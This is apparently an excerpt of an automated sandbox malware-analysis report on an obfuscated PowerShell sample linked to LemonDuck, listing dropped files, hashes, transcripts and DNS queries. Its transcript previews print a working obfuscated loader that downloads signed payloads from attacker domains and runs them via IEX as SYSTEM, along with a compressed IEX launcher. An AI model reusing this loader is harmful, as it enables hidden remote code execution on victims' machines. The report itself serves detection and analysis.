3.181 AN_8383883773636.xlsx Get hash malicious Browse 199.195.25 3.181 IMG_61_023_088.xls Get hash malicious Browse 209.141.61.124 IMG_61_023_088 (1).xls Get hash malicious Browse 209.141.61.124 IMG_065017223.xls Get hash malicious Browse 209.141.61.124 IMG_61_023_088.xls Get hash malicious Browse 209.141.61.124 IMG_61_023_088 (1).xls Get hash malicious Browse 209.141.61.124
JA3 Fingerprints
No context
Dropped Files
Match Associated Sample Name / URL SHA 256 Detection Link Context C:\Windows\System32\WindowsPowerS mltqanainst.exe Get hash malicious Browse hell\v1.0\ncETd2A.exe lemonduck.bat Get hash malicious Browse
Created / dropped Files
Copyright Joe Security LLC 2021 Page 12 of 34 C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 21038 Entropy (8bit): 4.909029203424605 Encrypted: false SSDEEP: 384:Xwib4L+kjh4iUxm44Qib4wrwib4LEVoGIpN6KQkj2jkjh4iUxm44Qib4w:XEjh4iUxm44jrEEV3IpNBQkj22h4iUx+ MD5: CB7670859EF4E8A4EDC879121F0786C8 SHA1: F5BB43F6ACC66809D257334D8EB2713B99AB4BA6 SHA-256: 79CFAAA518DFDC3517EDDF54656E753C5943BE6B466B5EBCD18D416D7E94F7AB SHA-512: C3B32DC42E494AF5D323D589A9571A0A11B308FAFADA65EC25241837B8B73976E26C50E8911D29C9D905D1D3C8C5D773AA7B3798E1479201F2CFC6DE3D6A5A4 3 Malicious: false Preview: PSMODULECACHE...... S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1...... Uninstall-Module...... inmo...... fimo...... I nstall-Module...... New-ScriptFileInfo...... Publish-Module...... Install-Script...... Update-Script...... Find-Command...... Update-ModuleManifest...... Find-DscResource...... Save-Module...... Save-Script...... upmo...... Uninstall-Script...... Get-InstalledScript...... Update-Module...... Register-PSRepository...... Find-Script...... Unregister- PSRepository...... pumo...... Test-ScriptFileInfo...... Update-ScriptFileInfo...... Set-PSRepository...... Get-PSRepository...... Get-InstalledModule...... Find-Module...... Fi nd-RoleCapability...... Publish-Script...... Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1...... Describe...... Get-TestDriveItem...... New-Fixture...... In...... Invoke-Mock...... InModuleScope...... Mock...... SafeGetCommand...... Af
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 1200 Entropy (8bit): 5.32145086887235 Encrypted: false SSDEEP: 24:3UCPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKzxxM:lPerB4nqRL/HvFe9t4Cv94ExxM MD5: 07DF35DAA7B52B034E14D21B9729EF73 SHA1: DEB973ED2B3F9A550E297305E467AD54BE5B0A42 SHA-256: BAE7322FFE6007C884E1FD14EBE25C1A8BC14E6695DE03EE4D6787687DE1116C SHA-512: 34AF106F67A5E776FC590565F1285FDD82B11D6CD971C18AC83380FE298D408CBC58729E7D0BDBB38FD1675581657ED80BCAF6F318EA4D6449D1D46C6BF63839 Malicious: false Preview: @...e...... @...... 8...... '....L..}...... System.Numerics.H...... <@.^.L."My...:...... Microsoft.PowerShell.ConsoleHost0...... G-.o.. .A...4B...... System..4...... [...{a.C..%6..h...... System.Core.D...... fZve...F.....x.)...... System.Management.AutomationL...... 7.....J@...... ~...... #.Micro soft.Management.Infrastructure.<...... H..QN.Y.f...... System.Management...@...... Lo...QN...... C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0w0oqh2u.0kt.psm1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4vo42c5.32s.psm1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB Copyright Joe Security LLC 2021 Page 13 of 34 C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4vo42c5.32s.psm1 SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogvuf2od.24o.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3ede30a.tgp.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\94W9CQGTJ8OHXP5R3URQ.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 6205 Entropy (8bit): 3.76119249482477 Encrypted: false SSDEEP: 96:kW+9mmW60CO+S/q3kvhkvCCt4KNHbKNHM:V+9mmBPb48V MD5: A49EC9E654F5E56A05616C41231636D4 SHA1: 20EEBB1C821C13A041003245356AC5C4EFB9C726 SHA-256: 2BE5A6119F4EF7C37EF3AB34AFB9F0706CDE7B180E48914278A1389F9085F40A SHA-512: 1E8861D065ABE6067D75C97E47872B40789BD9F036D31DF362F1C8F0F8589726AAF2C0045FB92869A64649048B7E9C6412057EF58D4F59F7821638ED53362E6C Malicious: false Preview: ...... FL...... F."...... J...-...rt^.`..\...... :..DG..Yr?.D..U..k0.&...&...... -..,U.S.....:*..b...... t...CFSF..1...... N....AppData...t.Y^...H.g.3..( .....gVA.G..k...@...... N...Rh...... Y...... yN|.A.p.p.D.a.t.a...B.V.1...... N....Roaming.@...... N...Rh...... Y...... K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D...... N... Rh...... Y...... sJ.M.i.c.r.o.s.o.f.t.....V.1.....>Q{<..Windows.@...... N...Rh...... Y...... ;.W.i.n.d.o.w.s...... 1...... N....STARTM~1..n...... N..>Q.;.....Y...... D. ....6...S.t.a.r.t. [email protected].,.-.2.1.7.8.6...... 1...... P.S..Programs..j...... N..>Q.;.....Y...... @...... [email protected].,.-.2.1.7.8.2..... n.1...... L...WINDOW~1..V...... N..>QZ7.....Y...... T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2...... L.. .WINDOW~1.LNK..^...... N...P3Q.....Y...... C:\Users\user\Documents\20210616\PowerShell_transcript.445817.XZ9drXoY.20210616182728.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Category: dropped Size (bytes): 9240 Entropy (8bit): 5.321363153813042 Copyright Joe Security LLC 2021 Page 14 of 34 C:\Users\user\Documents\20210616\PowerShell_transcript.445817.XZ9drXoY.20210616182728.txt Encrypted: false SSDEEP: 192:Mqmy270vFR/ba/H4abIbf4ab3WZ3B4U4aEEArrrrl:Mqmy270vFR/bahbItb6Krrrrl MD5: 047791CFD6517246FC9795DA9BB623AA SHA1: E7CCAF450589DDF951EF6F68F277AA61BC4C480E SHA-256: F773F8DD28C2059A09410B232373A9B7D69E2211AA394A3E23FCFE813735D19A SHA-512: 8D51DBF3C4BC6AD16564BC8584FC3A215A21951750899F1228FB3D9E648874B44174471CFBD2917453171BA22CD7C60C409D5B0FC0AFB875CC5DAFA95DFDACF 1 Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182729..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noLogo -ExecutionPolicy un restricted -file C:\Users\user\Desktop\malicious.ps1..Process ID: 7148..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.171 34.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..********** ************..**********************..Command start time: 20210616182729..**********************..PS>CommandInvocation(malicious.ps1): "malicious.ps1"..=gim : The term '= gim' is not recognized as the name of a cmdlet, function, script file, or operable program. Check..the spelling of the name, or if a path was included, verify th C:\Users\user\Documents\20210616\PowerShell_transcript.445817.lHI+ki+5.20210616182730.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Category: dropped Size (bytes): 3136 Entropy (8bit): 5.271494414019607 Encrypted: false SSDEEP: 96:BZxjtNlqDo1ZnZnjtNlqDo1ZxbvOGmmGmmqmVZ8:hvOGmmGmmqmE MD5: 9906789421C31D66FACB1DD9120A14EA SHA1: 2DB78BE5B140CC2ABD9C01DCF0BCB186AB88AFEE SHA-256: D08E0B6C6463C9C0B33E4EB89255C12DD21CD24E4EB539D828CC36369A267963 SHA-512: D881AA3A98D49195BDE7E7062FBB80C0CF3F0FAA465823E89FDFA1E8E100C9FC6470D44F44A66689EFA6604703EB2AFC640A404666ED5FF03F3104AA86D0A544 Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182730..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c IEx =gim..Process ID: 59 16..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42 000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 2021061618 2730..**********************..PS>IEx =gim..**********************..Windows PowerShell transcript start..Start time: 20210616183256..Username: computer\user..RunAs User: c omputer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v C:\Windows\System32\20210616\PowerShell_transcript.445817.5MfyPqnp.20210616182839.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Category: dropped Size (bytes): 2309 Entropy (8bit): 5.958391998830944 Encrypted: false SSDEEP: 48:BZ1vNtoOfpiGyh2w45Dj9j4dDcjlGqDYB1ZFpiGyh2w45Dj9j4dDcjG:BZ5NtNfpip0Dj9j2DcsqDo1ZFpip0DjA MD5: F3E84CD071ACCBFBEEF1287E39E17A39 SHA1: DF57600C9CB5CC33F241DD28228A2270C061577F SHA-256: 321BA0B6310F694D12ABC3E64214BA616DBBFC55B5257532C17F1D4CEEC3F46B SHA-512: CBA2321872E7D73628E37BFC807447B2FEE65420923E084C5528A90B894140A4295BF0538242E3057C55A8301276EF6F07193B38EC948B625E23B8E62AE0D659 Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182840..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Co nfiguration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).DownloadData($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAPa rameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk7 9oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[co nvert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.oul'+'er.cc';a($url+'/ C:\Windows\System32\20210616\PowerShell_transcript.445817.5hlgzxzH.20210616182846.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Category: dropped Size (bytes): 5450 Entropy (8bit): 5.830394031528827 Encrypted: false SSDEEP: 96:BZMNtNfpip0Dj9j2Dc0qDo1ZSpip0Dj9j2DcLZ1NtNfpip0Dj9j2Dc0qDo1Z5L2r:mo4pDo4pZo4psss6 MD5: E0FE70C33FECFFE060B7ED2E1A15ABEA SHA1: B27C6DF13C5CC109E075A2CA943A731FB4F94B3B SHA-256: D7F6DE01F1075F2E0E5F3199D7ADB4222765CFB781DBFB85F2594A41656D12B1 Copyright Joe Security LLC 2021 Page 15 of 34 C:\Windows\System32\20210616\PowerShell_transcript.445817.5hlgzxzH.20210616182846.txt SHA-512: AF4C7B71B7FDF8A0BDA7D7307ECE096F26544CDE720E4C7BE9A4C41FBC5DB801D81327D503CDD2F0E416F9E577792B3C15B16CBBAF365562DCE7284908F552 DA Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182847..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Co nfiguration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).DownloadData($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAPa rameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk7 9oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[co nvert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.nte'+'le.net';a($url+' C:\Windows\System32\20210616\PowerShell_transcript.445817.hwRyXbY9.20210616182823.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Category: dropped Size (bytes): 3163 Entropy (8bit): 5.330124904152896 Encrypted: false SSDEEP: 96:BZPNtNsqDo1ZlZONtNsqDo1ZOXv2q9nq9n+9SZz:3v2qRqR+C MD5: 6B2F449830A4A1B71458C3B5A3AC3D63 SHA1: 7FD090FD1CF28CE0BFB29762D0A8099F665B2A59 SHA-256: 0AF764155E2B327BFB0B68B2D559BFE62F56013D7E322978D4016F9E1DD1766A SHA-512: 5341F1290B0EA9F72307108026AD8A5CF69690D4B5984FD16BD102B0C325FDF864A59AA00E9B4CDA3C2193F7566E6017C51402A763269272AF4FDA22F4840DD1 Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182824..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Co nfiguration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c PS_CMD..Process ID: 6132..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1.. CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..******************** **..Command start time: 20210616182824..**********************..PS>PS_CMD..**********************..Windows PowerShell transcript start..Start time: 202106161832 48..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell C:\Windows\System32\WindowsPowerShell\v1.0\ncETd2A.exe Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: PE32+ executable (console) x86-64, for MS Windows Category: dropped Size (bytes): 447488 Entropy (8bit): 5.440627434620499 Encrypted: false SSDEEP: 6144:f1eapvqlkiMWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:NzW2KXzJ4pdd3klnnWosPhnzq MD5: 95000560239032BC68B4C2FDFCDEF913 SHA1: 1B3B40FBC889FD4C645CC12C85D0805AC36BA254 SHA-256: D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677 SHA-512: F990F72F4D90CE49F7A44DA0C0CDD82D56A7DC7461E073646ACFD448379B2ADEFD6E29FB2A596A9C8819DE53FA709905C98007B70DD4CF98569373013E42EE49 Malicious: true Antivirus: Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0% Joe Sandbox Filename: mltqanainst.exe, Detection: malicious, Browse View: Filename: lemonduck.bat, Detection: malicious, Browse Preview: MZ...... @...... !..L.!This program cannot be run in DOS mode....$...... G...... G...... +...... Rich...... PE..d....)...... "...... P...... 2...... @...... `...... |@...... p...}...`...... 0...P...T...... (...... text...... `.rdata...... @[email protected]...... <...... @....pdata...... `...... B...... @[email protected]....}...p...~...L...... @[email protected]...... @..B...... C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 57895 Entropy (8bit): 5.080080220298808 Encrypted: false SSDEEP: 1536:fB0+jH0PgNxV3CNBQkj22h4iUxKflJd6a59/rOu6CjKSSZWrxTeNgtAHkIh3Cwno:J0+jH04NxV3CNBQkj22qiUKflJd6a59l MD5: 4C72EAB6D884821C1A35BBA60F26B1CC SHA1: 50AB1C2DA70FE7957F5EEA83A2F7DC9BC50FD69C SHA-256: 2703E9C6DDEE61DDC9C86391A0E24AA8141385E844D5B96397CDF3E8D1DE72BE SHA-512: CA73E5B16131AAA22B1CB5F6E0083CDD38FDC4CAA84D378B927E6B6881D54E890F1093FA240D6E3C39CC56E2F9111E8B0703C53DF435367A60C7575D537BCC2 7 Copyright Joe Security LLC 2021 Page 16 of 34 C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Malicious: false Preview: PSMODULECACHE.X...... I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L...... Update-SmbMultichannelConnection...... gsmbse...... Get-SmbClientNetworkInterface...... Get-SmbOpenFile...... rksmba...... gsmbsc...... Revoke-SmbShareAccess...... nsmbm...... nsmbgm...... Set-SmbClie ntConfiguration...... Get-SmbBandWidthLimit...... New-SmbGlobalMapping...... ssmbcc...... cssmbse...... gsmbt...... Block-SmbShareAccess...... dsmbd...... gsmbs...... Remove-SmbMultichannelConstraint...... Get-SmbMultichannelConnection...... Unblock-SmbShareAccess...... Get-SmbServerConfiguration...... Enable-SmbDel egation...... gsmbo...... gsmbm...... udsmbmc...... Close-SmbOpenFile...... Disable-SmbDelegation...... gsmbd...... gsmbcn...... gsmbb...... gsmbc...... Get-Smb ServerNetworkInterface...... gsmba...... Set-SmbServerConfiguration...... gsmbcc...... Remove-SmbMapping...... rsmbm...... grsmba...... Get-SmbShareAccess...... u lsmba..... C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 1196 Entropy (8bit): 5.356421956480846 Encrypted: false SSDEEP: 24:3anPpQrLAo4KAxX5qRPD42FCvKMOoFe9tOBPnKdSl9rKq:qnPerB4nqRL/FCvNvFe9tOBfuur MD5: 7E30B19C55A8DB436BE72229FF7C9E07 SHA1: E417906D3E3CF505ABA82610F83D2F67B61887AC SHA-256: 312895C06FB6DB27FA06E9179EB97907DC73A44F95F581547C6518415CC099B6 SHA-512: E3E53DDEA2B9DFFE3DEF21953B28E2394E0CA851FC1052A27A5E071441EBEDA40C0C8F9FDB2A02946292BCCC5E4A79B8C6C09A923FAA6D1E630D12794C6A79 80 Malicious: false Preview: @...e...... 8...... @...... 8...... '....L..}...... System.Numerics.H...... <@.^.L."My...:...... Microsoft.PowerShell.ConsoleHost0...... G-.o.. .A...4B...... System..4...... [...{a.C..%6..h...... System.Core.D...... fZve...F.....x.)...... System.Management.AutomationL...... 7.....J@...... ~...... #.Micro soft.Management.Infrastructure.<...... H..QN.Y.f...... System.Management...@...... Lo...QN...... C:\Windows\Temp\__PSScriptPolicyTest_1pmnnlzv.hvf.psm1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 C:\Windows\Temp\__PSScriptPolicyTest_3tg2ae12.gkp.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 C:\Windows\Temp\__PSScriptPolicyTest_gidcembc.kyn.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Copyright Joe Security LLC 2021 Page 17 of 34 C:\Windows\Temp\__PSScriptPolicyTest_gidcembc.kyn.ps1 Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 C:\Windows\Temp\__PSScriptPolicyTest_k3lcavma.h2b.psm1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 C:\Windows\Temp\__PSScriptPolicyTest_tf4zkawf.54y.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 C:\Windows\Temp\__PSScriptPolicyTest_wichkcxw.kk0.psm1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1 \Device\ConDrv Process: C:\Windows\System32\netsh.exe File Type: ASCII text, with CRLF line terminators Copyright Joe Security LLC 2021 Page 18 of 34 \Device\ConDrv Category: dropped Size (bytes): 7 Entropy (8bit): 2.2359263506290326 Encrypted: false SSDEEP: 3:t:t MD5: F1CA165C0DA831C9A17D08C4DECBD114 SHA1: D750F8260312A40968458169B496C40DACC751CA SHA-256: ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8 SHA-512: 052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646 Malicious: false Preview: Ok..... Static File Info General File type: ASCII text, with very long lines, with CRLF line t erminators Entropy (8bit): 4.252596265687726 TrID: File name: malicious.ps1 File size: 8039 MD5: 75f885a4e9484ce240815f89be7427c5 SHA1: cd3ef6f1125a23ae02e63e9b3dc62551c1842aec SHA256: 7829a0b0e536f60e76ca6fe6aa4f76f6cc61432b8aee30f7 5de1d5ee2ef729a5 SHA512: 1c472a6d3c5d0d179c33f3c40ffb7c3e2cec3dee9d67e66 81a69c886d832b87ff3ba6cc0ef350356a5580c1c50145f a3581dd36a94a9ce3fd4004c902f8b0c67 SSDEEP: 192:orkwOVpdidA3BlFdEx5C402qAhheM5cFIX+Yv2QI QJewKNqtYwh:oQwOVrtd+5C40MheM5cc+YvFISyGh File Content Preview: C:\Windows\System32\WindowsPowerShell\v1.0\power shell.exe -c IEx $v='gim';..I`EX $(New-Object IO.Stream Reader ($(New-Object IO.Compression.DeflateStream ( $(New-Object IO.MemoryStream (,$('4d78d7cef4ca95d dab7c179e39e717a59f39e98e39e7d06c0a82c166ce395 a7e77b File Icon Icon Hash: 72f2d6fef6f6dae4 Network Behavior Network Port Distribution TCP Packets UDP Packets DNS Queries Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jun 16, 2021 18:28:46.907397032 CEST 192.168.2.4 8.8.8.8 0x7c0a Standard query t.ouler.cc A (IP address) IN (0x0001) (0) Copyright Joe Security LLC 2021 Page 19 of 34 Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jun 16, 2021 18:28:46.993536949 CEST 192.168.2.4 8.8.8.8 0x75d2 Standard 